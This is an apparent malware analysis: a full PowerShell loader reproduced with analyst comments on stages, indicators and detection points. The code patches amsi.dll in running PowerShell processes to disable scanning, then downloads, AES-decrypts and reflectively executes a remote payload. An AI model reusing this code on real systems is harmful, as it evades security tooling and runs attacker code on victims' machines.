# Analyst annotation. The file is PowerShell with an embedded C# P/Invoke class, not C#.
# Line layout is restored from a collapsed paste; the code itself is unchanged.
# Stages visible in this script:
#   1. Terminates its own parent process.
#   2. Compiles P/Invoke wrappers for cross-process memory APIs via Add-Type.
#   3. Searches amsi.dll inside every "powershell" process for a 32-byte pattern and
#      writes 3 bytes near the match (in-memory AMSI tampering).
#   4. Downloads a blob over HTTPS, AES-decrypts it with a key/IV embedded below,
#      loads it as a .NET assembly from memory and invokes its entry point.
# Indicators present on the page: the URL in $anchor, the user environment variable
# BUILD=Titan, the marker comment "#ujhifsfiohdf", and the static AES key/IV strings.

# Stage 1: look up this process's parent PID ($PID is the current PowerShell process) and
# force-terminate it. The variable is named $path but holds a process id.
$path = (Get-CimInstance Win32_Process -Filter "ProcessId=$PID").ParentProcessId
if ($path) { Stop-Process -Id $path -Force }

# Stage 2: runtime-compiled C# class exposing four kernel32 exports. The combination
# OpenProcess + ReadProcessMemory + VirtualProtectEx + WriteProcessMemory in an Add-Type
# block is a strong static signal for script-block logging (event 4104) and content rules.
# On Windows PowerShell 5.1, Add-Type also spawns the C# compiler, which is observable
# in process-creation telemetry.
Add-Type @"
using System;
using System.Runtime.InteropServices;
public class K {
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern bool VirtualProtectEx(IntPtr h, IntPtr a, uint s, uint p, out uint o);
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern bool ReadProcessMemory(IntPtr h, IntPtr a, byte[] b, int s, out IntPtr r);
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern IntPtr OpenProcess(uint a, bool i, int p);
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern bool WriteProcessMemory(IntPtr h, IntPtr a, byte[] b, uint s, out int w);
}
"@

# Stage 3: AMSI tampering across all processes named "powershell".
# NOTE(review): $nest and $willow are read below but never assigned in the visible text;
# their values cannot be determined from this page.
function KJhbhb {
    # Short randomized delays (50-100 ms) recur between steps.
    Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101)
    $cove = Get-Process -Name "powershell" -ErrorAction SilentlyContinue
    if (!$cove) { exit 1 }
    foreach ($prairie in $cove) {
        Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101)
        # Opens each target with access mask 0x001F0FFF. Sysmon event 10 (ProcessAccess)
        # records this GrantedAccess value for powershell.exe -> powershell.exe handles.
        $dune = [K]::OpenProcess(0x001F0FFF, $nest, $prairie.Id)
        $电竞 = $null
        $castle = 0
        # Locate amsi.dll in the target's module list; keep its base address and size.
        foreach ($oasis in $prairie.Modules) {
            if ($oasis.ModuleName -eq "amsi.dll") {
                $电竞 = $oasis.BaseAddress
                $castle = $oasis.ModuleMemorySize
                break
            }
        }
        if (!$电竞) { continue }
        $jolt = [byte[]]::new(32)
        # 32-byte pattern searched for inside the module. Presumably the prologue of an
        # AMSI scanning routine; this page does not name the function.
        # The byte sequence is usable as a static signature for this script family.
        $stream = [byte[]]@(0x4c,0x8b,0xdc,0x49,0x89,0x5b,0x08,0x49,0x89,0x6b,0x10,0x49,0x89,0x73,0x18,0x57,0x41,0x56,0x41,0x57,0x48,0x83,0xec,0x70,0x4d,0x8b,0xf9,0x41,0x8b,0xf8,0x48,0x8b)
        $haze = $null
        # Walk the module in 32-byte steps, reading remote memory and comparing each
        # window with $stream. The ReadProcessMemory result is not checked.
        for ($gully = 0; $gully -le $castle; $gully += 32) {
            $globe = [IntPtr]::Zero
            [K]::ReadProcessMemory($dune, [IntPtr]($电竞.ToInt64() + $gully), $jolt, 32, [ref]$globe)
            $lake = $willow
            for ($echo = 0; $echo -lt 32; $echo++) {
                if ($jolt[$echo] -ne $stream[$echo]) { $lake = $nest; break }
            }
            if ($lake) { $haze = [IntPtr]($电竞.ToInt64() + $gully); break }
        }
        if (!$haze) { continue }
        Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101)
        $spire = 0
        # Sets protection 0x40 (PAGE_EXECUTE_READWRITE) on 0x1000 bytes at the module base.
        # An RWX change on a signed system DLL's image is a memory-integrity detection point.
        [K]::VirtualProtectEx($dune, $电竞, 0x1000, 0x40, [ref]$spire)
        # Writes 3 bytes at match + 0x1b inside amsi.dll in the remote process.
        # Comparing in-memory amsi.dll code with the on-disk image exposes this modification.
        $grove = [byte[]]@(0x31,0xff,0x90)
        $haven = 0
        [K]::WriteProcessMemory($dune, [IntPtr]($haze.ToInt64() + 0x1b), $grove, 3, [ref]$haven)
    }
}
KJhbhb
#ujhifsfiohdf
# setx persists BUILD=Titan as a user environment variable, leaving a host artifact
# that can be hunted for. Its purpose is not shown here; it is possibly a campaign or build tag.
setx BUILD "Titan"
# Stage 4: fetch, decrypt and run a payload without writing it to disk.
# The URL below is the network indicator for this sample.
$anchor = "https://sdfas-cloud.b-cdn.net/wqegfasd.bin"
$isle = [System.Net.WebClient]::new()
$keel = $isle.DownloadData($anchor)
# AES with a 32-byte key and 16-byte IV, both hard-coded as UTF-8 strings. Aes.Create()
# is left at its defaults (CBC, PKCS7), so a captured copy of the .bin can be decrypted
# offline for analysis using the values on this page.
$iris = [System.Security.Cryptography.Aes]::Create()
$verge = [System.Text.Encoding]::UTF8.GetBytes("X7b9PqT3mW2kL8vR5nY6zJ1hF4tD9cM0")
$glade = [System.Text.Encoding]::UTF8.GetBytes("K9mW3pQ7tR2vL8nY")
$iris.Key = $verge
$iris.IV = $glade
$flower = $iris.CreateDecryptor()
$inlet = $flower.TransformFinalBlock($keel, 0, $keel.Length)
# Reflective load: the decrypted bytes are loaded as a .NET assembly from memory and its
# entry point is invoked with no arguments. Assembly loads with no backing file path
# appear in .NET runtime ETW telemetry.
$urn = [System.Reflection.Assembly]::Load($inlet)
$vapor = $urn.EntryPoint
$vapor.Invoke($null, $null)
#ujhifsfiohdf